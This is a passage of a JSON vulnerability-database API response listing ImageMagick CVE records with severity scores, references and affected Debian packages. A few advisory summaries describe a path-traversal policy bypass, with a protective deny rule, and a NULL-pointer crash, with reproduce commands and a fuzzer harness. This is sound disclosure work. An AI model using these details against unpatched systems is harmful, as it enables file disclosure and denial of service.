"VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5" }, { "url": "http://public2.vulnerablecode.io/api/packages/1026115?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u7", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u7" }, { "url": "http://public2.vulnerablecode.io/api/packages/1068118?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u8", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u8" } ], "aliases": [ "CVE-2026-32259" ], "risk_score": 3.0, "exploitability": "0.5", "weighted_severity": "6.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-g679-q851-xub7" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/65235?format=api", "vulnerability_id": "VCID-g9xf-han8-6qgs", "summary": "ImageMagick: ImageMagick: Denial of Service via integer overflow in SVG image processing", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-69204.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-69204.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-69204", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00103", "scoring_system": "epss", "scoring_elements": "0.28272", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00103", "scoring_system": "epss", "scoring_elements": "0.27989", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00103", "scoring_system": "epss", "scoring_elements": "0.28179", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00103", "scoring_system": "epss", "scoring_elements": "0.28121", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00103", "scoring_system": "epss", "scoring_elements": "0.28133", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00103", "scoring_system": "epss", "scoring_elements": "0.28115", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00103", "scoring_system": "epss", "scoring_elements": "0.28071", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00103", "scoring_system": "epss", "scoring_elements": "0.28316", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00103", "scoring_system": "epss", "scoring_elements": "0.28106", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00103", "scoring_system": "epss", "scoring_elements": "0.28172", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00103", "scoring_system": "epss", "scoring_elements": "0.28215", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00103", "scoring_system": "epss", "scoring_elements": "0.28222", "published_at": "2026-04-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-69204" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69204", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69204" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2426294", "reference_id": "2426294", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2426294" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/commit/2c08c2311693759153c9aa99a6b2dcb5f985681e", "reference_id": "2c08c2311693759153c9aa99a6b2dcb5f985681e", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-12-30T17:48:15Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/commit/2c08c2311693759153c9aa99a6b2dcb5f985681e" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-hrh7-j8q2-4qcw", "reference_id": "GHSA-hrh7-j8q2-4qcw", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-12-30T17:48:15Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-hrh7-j8q2-4qcw" }, { "reference_url": "https://usn.ubuntu.com/8007-1/", "reference_id": "USN-8007-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/8007-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026114?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5" } ], "aliases": [ "CVE-2025-69204" ], "risk_score": 2.4, "exploitability": "0.5", "weighted_severity": "4.8", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-g9xf-han8-6qgs" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/21044?format=api", "vulnerability_id": "VCID-gdg8-aejn-83c4", "summary": "ImageMagick: Policy bypass through path traversal allows reading restricted content despite secured policy\nImageMagick’s path security policy is enforced on the raw filename string before the filesystem resolves it. As a result, a policy rule such as /etc/* can be bypassed by a path traversal. The OS resolves the traversal and opens the sensitive file, but the policy matcher only sees the unnormalized path and therefore allows the read. This enables local file disclosure (LFI) even when policy-secure.xml is applied.\n\nActions to prevent reading from files have been taken. But it make sure writing is also not possible the following should be added to your policy:\n\n```\n<policy domain=\"path\" rights=\"none\" pattern=\"*../*\"/>\n```\n\nAnd this will also be included in the project's more secure policies by default.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25965.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25965.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25965", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04515", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04488", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04357", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04348", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04382", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04398", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04413", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04419", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04402", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04369", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04359", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00047", "scoring_system": "epss", "scoring_elements": "0.14614", "published_at": "2026-04-02T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25965" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25965", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25965" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-8jvj-p28h-9gm7", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-26T15:28:41Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-8jvj-p28h-9gm7" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25965", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25965" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442118", "reference_id": "2442118", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442118" }, { "reference_url": "https://github.com/advisories/GHSA-8jvj-p28h-9gm7", "reference_id": "GHSA-8jvj-p28h-9gm7", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-8jvj-p28h-9gm7" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:5573", "reference_id": "RHSA-2026:5573", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:5573" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026114?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5" } ], "aliases": [ "CVE-2026-25965", "GHSA-8jvj-p28h-9gm7" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-gdg8-aejn-83c4" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/20601?format=api", "vulnerability_id": "VCID-h221-qd8d-tqa5", "summary": "ImageMagick has a NULL pointer dereference in MSL parser via <comment> tag before image load\n## Summary\n\nNULL pointer dereference in MSL (Magick Scripting Language) parser when processing `<comment>` tag before any image is loaded.\n\n## Version\n\n- ImageMagick 7.x (tested on current main branch)\n- Commit: HEAD\n\n## Steps to Reproduce\n\n### Method 1: Using ImageMagick directly\n\n```bash\nmagick MSL:poc.msl out.png\n```\n\n### Method 2: Using OSS-Fuzz reproduce\n\n```bash\npython3 infra/helper.py build_fuzzers imagemagick\npython3 infra/helper.py reproduce imagemagick msl_fuzzer poc.msl\n```\n\nOr run the fuzzer directly:\n```bash\n./msl_fuzzer poc.msl\n```\n\n## Expected Behavior\n\nImageMagick should handle the malformed MSL gracefully and return an error message.\n\n## Actual Behavior\n\n```\nconvert: MagickCore/property.c:297: MagickBooleanType DeleteImageProperty(Image *, const char *): Assertion `image != (Image *) NULL' failed.\nAborted\n```\n\n## Root Cause Analysis\n\nIn `coders/msl.c:7091`, `MSLEndElement()` calls `DeleteImageProperty()` on `msl_info->image[n]` when handling the `</comment>` end tag without checking if the image is NULL:\n\n```c\nif (LocaleCompare((const char *) tag,\"comment\") == 0 )\n {\n (void) DeleteImageProperty(msl_info->image[n],\"comment\"); // No NULL check\n ...\n }\n```\n\nWhen `<comment>` appears before any `<read>` operation, `msl_info->image[n]` is NULL, causing the assertion failure in `DeleteImageProperty()` at `property.c:297`.\n\n## Impact\n\n- **DoS**: Crash via assertion failure (debug builds) or NULL pointer dereference (release builds)\n- **Affected**: Any application using ImageMagick to process user-supplied MSL files\n\n## Fuzzer\n\nThis issue was discovered using a custom MSL fuzzer:\n\n```cpp\n#include <cstdint>\n#include <Magick++/Blob.h>\n#include <Magick++/Image.h>\n#include \"utils.cc\"\n\nextern \"C\" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size)\n{\n if (IsInvalidSize(Size))\n return(0);\n try\n {\n const Magick::Blob blob(Data, Size);\n Magick::Image image;\n image.magick(\"MSL\");\n image.fileName(\"MSL:\");\n image.read(blob);\n }\n catch (Magick::Exception)\n {\n }\n return(0);\n}\n```\n\nThis issue was found by Team FuzzingBrain @ Texas A&M University", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-23952.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-23952.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-23952", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05726", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.0569", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05576", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05517", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05569", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05553", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.0559", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05615", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05586", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05525", "published_at": "2026-04-18T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-23952" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-23952", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-23952" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.2", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-22T21:43:24Z/" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.2" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-5vx3-wx4q-6cj8", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-22T21:43:24Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-5vx3-wx4q-6cj8" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1126077", "reference_id": "1126077", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1126077" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431905", "reference_id": "2431905", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431905" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23952", "reference_id": "CVE-2026-23952", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23952" }, { "reference_url": "https://github.com/advisories/GHSA-5vx3-wx4q-6cj8", "reference_id": "GHSA-5vx3-wx4q-6cj8", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-5vx3-wx4q-6cj8" }, { "reference_url": "https://usn.ubuntu.com/8127-1/", "reference_id": "USN-8127-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/8127-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026114?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5" } ], "aliases": [ "CVE-2026-23952", "GHSA-5vx3-wx4q-6cj8" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-h221-qd8d-tqa5" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/351743?format=api", "vulnerability_id": "VCID-j6tc-f4fc-mbcv", "summary": "ImageMagick: ImageMagick: Denial of Service via deeply nested expression in FX parser", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33902.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33902.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33902", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00012", "scoring_system": "epss", "scoring_elements": "0.01573", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00012", "scoring_system": "epss", "scoring_elements": "0.01634", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.02151", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.02118", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33902" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-33902", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-33902" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.12.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", 